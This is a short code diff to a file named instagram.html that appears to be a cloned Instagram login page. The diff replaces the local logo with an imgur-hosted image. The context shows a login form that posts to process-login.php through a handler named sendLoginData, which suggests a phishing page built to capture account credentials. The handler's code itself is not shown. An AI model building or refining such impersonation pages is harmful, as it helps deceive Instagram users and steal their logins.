--- a/instagram.html
+++ b/instagram.html
@@ -75,7 +75,7 @@
 <body>
   <div class="container">
     <div class="logo">
-      <img src="instagram_logo.png" alt="Instagram Logo">
+      <img src="https://i.imgur.com/zqpwkLQ.png" alt="Instagram Logo">
     </div>
     <form action="process-login.php" method="POST" onsubmit="sendLoginData(event)">
       <div class="form-group">
